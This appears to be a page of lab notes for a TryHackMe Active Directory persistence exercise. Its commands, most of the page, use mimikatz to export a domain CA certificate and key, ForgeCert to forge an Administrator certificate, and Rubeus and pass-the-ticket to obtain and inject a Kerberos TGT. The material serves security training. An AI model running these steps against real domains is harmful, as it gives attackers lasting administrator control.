Persistence on the Domain

Step 1: Extract Root CA Certificate and Private Key

  1. Enumerate certificates in the local machine store:

    mimikatz # crypto::certificates /systemstore:local_machine

  2. Enable necessary privileges:

    mimikatz # privilege::debug

  3. Load cryptographic API for extraction:

    mimikatz # crypto::capi

  4. Export certificates (PFX and DER formats):

    mimikatz # crypto::certificates /systemstore:local_machine /export

Step 2: Generate Custom Certificates

Use ForgeCert to generate a certificate for persistence:

C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123

Step 3: Obtain a Ticket-Granting Ticket (TGT)

Use the generated certificate with Rubeus to request a TGT:

C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controller>

Step 4: Use the TGT

Inject the TGT using Mimikatz:

kerberos::ptt administrator.kirbi
PreviousSID historyNextTicket

Last updated